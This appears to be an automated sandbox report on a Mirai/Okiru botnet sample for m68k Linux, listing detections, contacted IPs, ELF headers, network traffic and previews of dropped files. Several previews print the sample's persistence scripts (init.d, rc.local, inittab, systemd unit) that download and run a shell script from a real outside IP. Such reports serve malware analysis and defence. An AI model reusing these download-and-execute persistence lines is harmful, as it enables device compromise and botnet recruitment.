                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1566179 Sample: m68k.nn.elf Startdate: 01/12/2024 Architecture: LINUX Score: 80 49 154.216.19.139, 199, 38968, 38970 SKHT-ASShenzhenKatherineHengTechnologyInformationCo Seychelles 2->49 51 109.202.202.202, 80 INIT7CH Switzerland 2->51 53 2 other IPs or domains 2->53 55 Multi AV Scanner detection for submitted file 2->55 57 Yara detected Okiru 2->57 59 Yara detected Mirai 2->59 8 m68k.nn.elf 2->8         started        12 gnome-session-binary sh gsd-housekeeping 2->12         started        14 udisksd dumpe2fs 2->14         started        16 6 other processes 2->16 signatures3 process4 file5 41 /etc/rc.local, POSIX 8->41 dropped 43 /etc/profile, ASCII 8->43 dropped 45 /etc/init.d/system, POSIX 8->45 dropped 61 Sample tries to set files in /etc globally writable 8->61 63 Sample tries to persist itself using /etc/profile 8->63 65 Drops files in suspicious directories 8->65 67 Sample tries to persist itself using System V runlevels 8->67 18 m68k.nn.elf sh 8->18         started        20 m68k.nn.elf sh 8->20         started        22 m68k.nn.elf sh 8->22         started        24 5 other processes 8->24 signatures6 process7 file8 28 sh chmod 18->28         started        31 sh ln 20->31         started        33 sh chmod 22->33         started        47 /etc/init.d/m68k.nn.elf, POSIX 24->47 dropped 69 Drops files in suspicious directories 24->69 35 sh ln 24->35         started        37 sh systemctl 24->37         started        39 sh mkdir 24->39         started        signatures9 process10 signatures11 71 Sample tries to set files in /etc globally writable 28->71 73 Sample tries to persist itself using System V runlevels 31->73
                SourceDetectionScannerLabelLink
                m68k.nn.elf34%ReversingLabsLinux.Backdoor.Mirai
                SourceDetectionScannerLabelLink
                /etc/rc.local0%ReversingLabs
                No Antivirus matches
                No Antivirus matches
                No contacted domains info
                NameSourceMaliciousAntivirus DetectionReputation
                http://94.156.227.233/curl.shm68k.nn.elffalse
                  high
                  http://94.156.227.233/lol.shm68k.nn.elffalse
                    high
                    http://94.156.227.233/oro1vk/usr/sbin/reboot/usr/bin/reboot/usr/sbin/shutdown/usr/bin/shutdown/usr/sm68k.nn.elffalse
                      high
                      http://94.156.227.233/m68k.nn.elf, profile.12.dr, system.12.dr, inittab.12.dr, bootcmd.12.dr, m68k.nn.elf.38.dr, custom.service.12.drfalse
                        high
                        • No. of IPs < 25%
                        • 25% < No. of IPs < 50%
                        • 50% < No. of IPs < 75%
                        • 75% < No. of IPs
                        IPDomainCountryFlagASNASN NameMalicious
                        154.216.19.139
                        unknownSeychelles
                        135357SKHT-ASShenzhenKatherineHengTechnologyInformationCofalse
                        109.202.202.202
                        unknownSwitzerland
                        13030INIT7CHfalse
                        91.189.91.43
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        91.189.91.42
                        unknownUnited Kingdom
                        41231CANONICAL-ASGBfalse
                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                        154.216.19.139powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                          arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                            m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                              m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                  m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                      m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                        na.elfGet hashmaliciousUnknownBrowse
                                          kj5f8keqNK.elfGet hashmaliciousUnknownBrowse
                                            109.202.202.202kpLwzBouH4.elfGet hashmaliciousUnknownBrowse
                                            • ch.archive.ubuntu.com/ubuntu/pool/main/f/firefox/firefox_92.0%2bbuild3-0ubuntu0.20.04.1_amd64.deb
                                            91.189.91.43powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                              arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                  botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                    snype.x86.elfGet hashmaliciousGafgytBrowse
                                                      snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                        Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                          boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                            boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                              boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                91.189.91.42powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                  arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                    sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                      botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                        snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                          snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                            Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                              boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    CANONICAL-ASGBpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.189.91.42
                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.189.91.42
                                                                                    sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.189.91.42
                                                                                    snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                    • 91.189.91.42
                                                                                    snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                    • 91.189.91.42
                                                                                    Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    CANONICAL-ASGBpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.189.91.42
                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 91.189.91.42
                                                                                    sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.189.91.42
                                                                                    snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                    • 91.189.91.42
                                                                                    snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                    • 91.189.91.42
                                                                                    Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 91.189.91.42
                                                                                    SKHT-ASShenzhenKatherineHengTechnologyInformationCopowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.19.139
                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.19.139
                                                                                    m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 154.216.19.139
                                                                                    hmips.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.254.70.159
                                                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.241.11.68
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.241.11.57
                                                                                    mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.241.11.45
                                                                                    ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.241.11.95
                                                                                    na.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.241.11.80
                                                                                    arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.241.11.55
                                                                                    INIT7CHpowerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 109.202.202.202
                                                                                    arm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                    • 109.202.202.202
                                                                                    sora.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    botnet.arm7.elfGet hashmaliciousUnknownBrowse
                                                                                    • 109.202.202.202
                                                                                    snype.x86.elfGet hashmaliciousGafgytBrowse
                                                                                    • 109.202.202.202
                                                                                    snype.ppc.elfGet hashmaliciousGafgytBrowse
                                                                                    • 109.202.202.202
                                                                                    Mozi.m.elfGet hashmaliciousUnknownBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    boatnet.mpsl.elfGet hashmaliciousMiraiBrowse
                                                                                    • 109.202.202.202
                                                                                    No context
                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    /etc/init.d/m68k.nn.elfm68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                      /etc/init.d/systemm68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                        /etc/rc.localarm.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                          mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                            mips.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                              powerpc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                x86_32.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                  x86_64.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                    sparc.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                      sh4.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                        mipsel.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                          m68k.nn.elfGet hashmaliciousMirai, OkiruBrowse
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):120
                                                                                                            Entropy (8bit):4.71023514082177
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:KPJRXSC/ANFDDoCvLdjX48FIbILbaaFOdFXa5O:WJRlufoYZX48bbaaeXCO
                                                                                                            MD5:82FAEE159509BB5192AA520D95440C3D
                                                                                                            SHA1:66BA9BC025F6E90666F34A8E38EAA89B719B7DC8
                                                                                                            SHA-256:E7BAC6C0AFEE6CC2EB7C778318124C284367B83C9EF3D6F7DDF9AC38FCF2F990
                                                                                                            SHA-512:D63BE1C08A45D85EB6B3DB74A93F1A266E194729CEF8BDB136597C3E89B83C36B495E12ADF73CC24484210824BC5122F87714446B9D1584C9D6ED0C0220D7B1E
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:run bootcmd_mmc0; /tmp/m68k.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                            Process:/bin/sh
                                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                                            Category:dropped
                                                                                                            Size (bytes):400
                                                                                                            Entropy (8bit):4.612244173377962
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:12:QRkiMEXNxl8GPUJgjvMHK2FSuKN+dRRucSOyd3:vRGcISzhYOM3
                                                                                                            MD5:42A0E283E013A117BA7E3D837377CF3E
                                                                                                            SHA1:6C5454636C1771F46A606C304DCE8B4AB80B566A
                                                                                                            SHA-256:1BB893683F5E24931B53216BEFA2506111E440E08ADA73924BE5BC6D93F69F90
                                                                                                            SHA-512:7D60DF45AB791CEF8ED0511D8E1AA36575A58F7213A1A217CB1C51DCABCF7C594441980B4216C81D5027212866421DFADE6FFCEBEFF29E2D81B828A1B7BF2C2B
                                                                                                            Malicious:true
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: m68k.nn.elf, Detection: malicious, Browse
                                                                                                            Reputation:low
                                                                                                            Preview:#!/bin/sh.# /etc/init.d/m68k.nn.elf..case "" in. start). echo 'Starting m68k.nn.elf'. /tmp/m68k.nn.elf &. wget http://94.156.227.233/ -O /tmp/lol.sh. chmod +x /tmp/lol.sh. /tmp/lol.sh &. ;;. stop). echo 'Stopping m68k.nn.elf'. killall m68k.nn.elf. ;;. restart). sh stop. sh start. ;;. *). echo "Usage: sh {start|stop|restart}". exit 1. ;;.esac.exit 0.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                                            Category:dropped
                                                                                                            Size (bytes):107
                                                                                                            Entropy (8bit):4.6965251577946185
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:TKH4vZKSC/ANFDvSDRFiLdjX48FIbILpaKB0dFLoKE0:h8luzSXoZX48bzBeLXE0
                                                                                                            MD5:75C3B0070571A42064490B0A59C5F54F
                                                                                                            SHA1:5E48FEB277032F0F45255EC98EC6FDDB9710180D
                                                                                                            SHA-256:3AAFF2180555B9691F8AECA6944ED2B5574D3612A0B4F91AE56A31DD30F3024B
                                                                                                            SHA-512:FAE041568F54085F8E91E004C14F26B8DF19267AF398D26166947A9C70BD0BD67C36D02078BD7DFFD0AF924D35EEADFB14880757B78354DA9823C4003FEF50F6
                                                                                                            Malicious:true
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: m68k.nn.elf, Detection: malicious, Browse
                                                                                                            Reputation:low
                                                                                                            Preview:#!/bin/sh./tmp/m68k.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh.chmod +x /tmp/lol.sh./tmp/lol.sh &.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):112
                                                                                                            Entropy (8bit):4.648300524622469
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:nAWu58C/ANFDDoCvLdjX48FIbILbaaFOdFXa5O:ANufoYZX48bbaaeXCO
                                                                                                            MD5:6B69B8EBA9149CE0E664318604481B1B
                                                                                                            SHA1:19EA18B050694AC87A05648235C7EE1BFD891815
                                                                                                            SHA-256:0D26FFA18F7B01205E1A8852E5B2B964711987AE35A7A56F512239F67DBC2D0F
                                                                                                            SHA-512:AAB12A8BD0B4D5F2970DCA2A2F7B1907F5DE8E68DC2B248CB04657D5F1FC7366E51A1F885ED31F64DD336698A0FF050729230BA4DF1CA860E7675C0F7526A746
                                                                                                            Malicious:false
                                                                                                            Reputation:low
                                                                                                            Preview:::respawn:/tmp/m68k.nn.elf && wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):53
                                                                                                            Entropy (8bit):3.871459242626451
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:yGKtARxFQFrgBJ4BJ+3e:dQ0EcHG2e
                                                                                                            MD5:2BD9B4BE30579E633FC0191AA93DF486
                                                                                                            SHA1:7D63A9BD9662E86666B27C1B50DB8E7370C624FF
                                                                                                            SHA-256:64DC39F3004DC93C9FC4F1467B4807F2D8E3EB0BFA96B15C19CD8E7D6FA77A1D
                                                                                                            SHA-512:AE6DD7B39191354CF43CF65E517460D7D4C61B8F5C08E33E6CA3C451DC7CAB4DE89F33934C89396B80F1AADE0A4E2571BD5AE8B76EF80B737D4588703D2814D5
                                                                                                            Malicious:false
                                                                                                            Reputation:moderate, very likely benign file
                                                                                                            Preview:gorilla botnet is on the device ur not a cat go away.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):103
                                                                                                            Entropy (8bit):4.539325085623206
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:TgSC/ANFDvSDRFiLdjX48FIbILbaaFOdFXa50:TgluzSXoZX48bbaaeXC0
                                                                                                            MD5:107E2A66E888E012915B4359DF5B17B1
                                                                                                            SHA1:A532A61F6D10B765D29B63248E84877DF85BB76C
                                                                                                            SHA-256:395C5BF18A2B8360C8D63A43B7FF55712985F066F9789F9B166F2A39092F9055
                                                                                                            SHA-512:6E2FC482B1AB8E3D7166F0A12A56464F071699FB2A110D98E9390822FA8994ABD40B1BA36566FA303FC68AAFB343AD6EA14CFD4EE6A42C9B275DCB94B1033A46
                                                                                                            Malicious:true
                                                                                                            Preview:/tmp/m68k.nn.elf &.wget http://94.156.227.233/ -O /tmp/lol.sh && chmod +x /tmp/lol.sh && /tmp/lol.sh &.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:POSIX shell script, ASCII text executable
                                                                                                            Category:dropped
                                                                                                            Size (bytes):10
                                                                                                            Entropy (8bit):3.121928094887362
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:TKH4vn:hv
                                                                                                            MD5:3E2B31C72181B87149FF995E7202C0E3
                                                                                                            SHA1:BD971BEC88149956458A10FC9C5ECB3EB99DD452
                                                                                                            SHA-256:A8076D3D28D21E02012B20EAF7DBF75409A6277134439025F282E368E3305ABF
                                                                                                            SHA-512:543F39AF1AE7A2382ED869CBD1EE1AC598A88EB4E213CD64487C54B5C37722C6207EE6DB4FA7E2ED53064259A44115C6DA7BBC8C068378BB52A25E7088EEEBD6
                                                                                                            Malicious:true
                                                                                                            Antivirus:
                                                                                                            • Antivirus: ReversingLabs, Detection: 0%
                                                                                                            Joe Sandbox View:
                                                                                                            • Filename: arm.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: mips.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: powerpc.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: x86_32.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: x86_64.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: sparc.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: sh4.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: mipsel.nn.elf, Detection: malicious, Browse
                                                                                                            • Filename: m68k.nn.elf, Detection: malicious, Browse
                                                                                                            Preview:#!/bin/sh.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):301
                                                                                                            Entropy (8bit):5.089772238578568
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:6:z8ifitRZAMzdK+xE02+GWRdbZX48B+GWRo3UN2+GWRuLYACGX9LQmWA4Rv:zNitRZAOK+xEp+GWRdtd+GWRXY+GWRuO
                                                                                                            MD5:5F2DE4BB7CB64F4FF46C92FBBBD18206
                                                                                                            SHA1:E548D43460D28039B78C3BBB88FD906D47831FB1
                                                                                                            SHA-256:53E1138FD67D03288BB94DD07128318C7FF79BFC504DA67BC00F10716F74D25A
                                                                                                            SHA-512:50E330A60E42EF795B2387E0296010AF2B3FEAE72EC09ED1F1E7E671B7A4EE30B097F30A428924C7AEE438EE0E6B1C8B6B8EBE60B8B685DB56EDD5942DED1D71
                                                                                                            Malicious:false
                                                                                                            Preview:[Unit].Description=Custom Binary and Payload Service.After=network.target..[Service].ExecStart=/tmp/m68k.nn.elf.ExecStartPost=/usr/bin/wget -O /tmp/lol.sh http://94.156.227.233/.ExecStartPost=/bin/chmod +x /tmp/lol.sh.ExecStartPost=/tmp/lol.sh.Restart=on-failure..[Install].WantedBy=multi-user.target.
                                                                                                            Process:/usr/lib/systemd/system-environment-generators/snapd-env-generator
                                                                                                            File Type:ASCII text
                                                                                                            Category:dropped
                                                                                                            Size (bytes):76
                                                                                                            Entropy (8bit):3.7627880354948586
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:+M4VMPQnMLmPQ9JEcwwbn:+M4m4MixcZb
                                                                                                            MD5:D86A1F5765F37989EB0EC3837AD13ECC
                                                                                                            SHA1:D749672A734D9DEAFD61DCA501C6929EC431B83E
                                                                                                            SHA-256:85889AB8222C947C58BE565723AE603CC1A0BD2153B6B11E156826A21E6CCD45
                                                                                                            SHA-512:338C4B776FDCC2D05E869AE1F9DB64E6E7ECC4C621AB45E51DD07C73306BACBAD7882BE8D3ACF472CAEB30D4E5367F8793D3E006694184A68F74AC943A4B7C07
                                                                                                            Malicious:false
                                                                                                            Preview:PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/bin.
                                                                                                            Process:/usr/libexec/gsd-housekeeping
                                                                                                            File Type:very short file (no magic)
                                                                                                            Category:dropped
                                                                                                            Size (bytes):1
                                                                                                            Entropy (8bit):0.0
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3::
                                                                                                            MD5:93B885ADFE0DA089CDF634904FD59F71
                                                                                                            SHA1:5BA93C9DB0CFF93F52B521D7420E43F6EDA2784F
                                                                                                            SHA-256:6E340B9CFFB37A989CA544E6BB780A2C78901D3FB33738768511A30617AFA01D
                                                                                                            SHA-512:B8244D028981D693AF7B456AF8EFA4CAD63D282E19FF14942C246E50D9351D22704A802A71C3580B6370DE4CEB293C324A8423342557D4E5C38438F0E36910EE
                                                                                                            Malicious:false
                                                                                                            Preview:.
                                                                                                            Process:/tmp/m68k.nn.elf
                                                                                                            File Type:ASCII text, with no line terminators
                                                                                                            Category:dropped
                                                                                                            Size (bytes):17
                                                                                                            Entropy (8bit):3.6168746059562227
                                                                                                            Encrypted:false
                                                                                                            SSDEEP:3:TgSC/ANln:TglOn
                                                                                                            MD5:CF5BFD6A623ECC046218AA0EBA4D8FE7
                                                                                                            SHA1:E3F0D3236A8D19B35DB7D7F81FECBA0A5D613E88
                                                                                                            SHA-256:C3A372684D6533CABFEC9940A5B0C21F5CD8C12CE9FECD07DE6D5C5E31C00560
                                                                                                            SHA-512:F2C31F4B0FA981357F508A6C3B32A3DAEDC609FDE9EC704411D022BE11643B7F6EC039421ACB9EDE5334ACA2A7F1068D5B55106F4BF46327A229E2A04D31547B
                                                                                                            Malicious:false
                                                                                                            Preview:/tmp/m68k.nn.elf.
                                                                                                            File type:ELF 32-bit MSB executable, Motorola m68k, 68020, version 1 (SYSV), statically linked, stripped
                                                                                                            Entropy (8bit):6.409844642732425
                                                                                                            TrID:
                                                                                                            • ELF Executable and Linkable format (generic) (4004/1) 100.00%
                                                                                                            File name:m68k.nn.elf
                                                                                                            File size:110'764 bytes
                                                                                                            MD5:21660026bffec7a97c1db4267f2e25b7
                                                                                                            SHA1:4d4e4360287bdb490fb17a987c73e222bdf7ad82
                                                                                                            SHA256:9453ed8ea2b513e3dac9ff38f93e4a978a674234a28db0a70b8527c6773aff91
                                                                                                            SHA512:ab4c609518ad269cf9022eadadaa446d6ced88b999d1dbacd7fb55764538fdf5b7eb6973ee2c62011b8da8f93fcf7b92a809ceebcf6404d6ab316e993514fc6a
                                                                                                            SSDEEP:3072:ZDWZwNZEtT/4LvQw9SxWp6AEdY4QyqT1hblj0qDTCjwaIN:ZK4bG4yq5Vlj0q3CXk
                                                                                                            TLSH:C4B35BD6B000CEBDFD1ED6BB44170A19F13663805F920F27A25BFCA7ED721985926E81
                                                                                                            File Content Preview:.ELF.......................D...4.........4. ...(.................................. .......................(....... .dt.Q............................NV..a....da...|.N^NuNV..J9....f>"y..., QJ.g.X.#....,N."y..., QJ.f.A.....J.g.Hy....N.X.........N^NuNV..N^NuN

                                                                                                            ELF header

                                                                                                            Class:ELF32
                                                                                                            Data:2's complement, big endian
                                                                                                            Version:1 (current)
                                                                                                            Machine:MC68000
                                                                                                            Version Number:0x1
                                                                                                            Type:EXEC (Executable file)
                                                                                                            OS/ABI:UNIX - System V
                                                                                                            ABI Version:0
                                                                                                            Entry Point Address:0x80000144
                                                                                                            Flags:0x0
                                                                                                            ELF Header Size:52
                                                                                                            Program Header Offset:52
                                                                                                            Program Header Size:32
                                                                                                            Number of Program Headers:3
                                                                                                            Section Header Offset:110364
                                                                                                            Section Header Size:40
                                                                                                            Number of Section Headers:10
                                                                                                            Header String Table Index:9
                                                                                                            NameTypeAddressOffsetSizeEntSizeFlagsFlags DescriptionLinkInfoAlign
                                                                                                            NULL0x00x00x00x00x0000
                                                                                                            .initPROGBITS0x800000940x940x140x00x6AX002
                                                                                                            .textPROGBITS0x800000a80xa80x17cae0x00x6AX004
                                                                                                            .finiPROGBITS0x80017d560x17d560xe0x00x6AX002
                                                                                                            .rodataPROGBITS0x80017d640x17d640x2bac0x00x2A002
                                                                                                            .ctorsPROGBITS0x8001c9140x1a9140x80x00x3WA004
                                                                                                            .dtorsPROGBITS0x8001c91c0x1a91c0x80x00x3WA004
                                                                                                            .dataPROGBITS0x8001c9280x1a9280x5b40x00x3WA004
                                                                                                            .bssNOBITS0x8001cedc0x1aedc0x223c0x00x3WA004
                                                                                                            .shstrtabSTRTAB0x00x1aedc0x3e0x00x0001
                                                                                                            TypeOffsetVirtual AddressPhysical AddressFile SizeMemory SizeEntropyFlagsFlags DescriptionAlignProg InterpreterSection Mappings
                                                                                                            LOAD0x00x800000000x800000000x1a9100x1a9106.42250x5R E0x2000.init .text .fini .rodata
                                                                                                            LOAD0x1a9140x8001c9140x8001c9140x5c80x28045.02060x6RW 0x2000.ctors .dtors .data .bss
                                                                                                            GNU_STACK0x00x00x00x00x00.00000x6RW 0x4
                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                            Dec 1, 2024 15:23:55.210190058 CET38968199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.332372904 CET19938968154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.332437038 CET38968199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.334924936 CET38968199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.336323977 CET38968199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.338496923 CET38970199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.455912113 CET19938968154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.459827900 CET19938970154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.459876060 CET38970199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.461118937 CET38970199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.461816072 CET38970199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.467716932 CET38972199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.500061035 CET19938968154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.586286068 CET19938970154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.593630075 CET19938972154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.593677044 CET38972199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.595521927 CET38972199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.596487999 CET38972199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.617844105 CET38974199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.628092051 CET19938970154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.721858978 CET19938972154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.744091034 CET19938974154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.744139910 CET38974199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.752249956 CET38974199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.762110949 CET38974199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.764079094 CET19938972154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.772022009 CET38976199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.872220993 CET19938974154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.892165899 CET19938976154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:55.892237902 CET38976199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.903733969 CET38976199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.906045914 CET38976199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.916670084 CET38978199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:55.928132057 CET19938974154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.023746967 CET19938976154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.036683083 CET19938978154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.038124084 CET38978199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.068079948 CET19938976154.216.19.139192.168.2.23
                                                                                                            Dec 1, 2024 15:23:56.077033043 CET38978199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.080030918 CET38978199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.085789919 CET38980199192.168.2.23154.216.19.139
                                                                                                            Dec 1, 2024 15:23:56.196965933 CET19938978154.216.19.139192.168.2.23
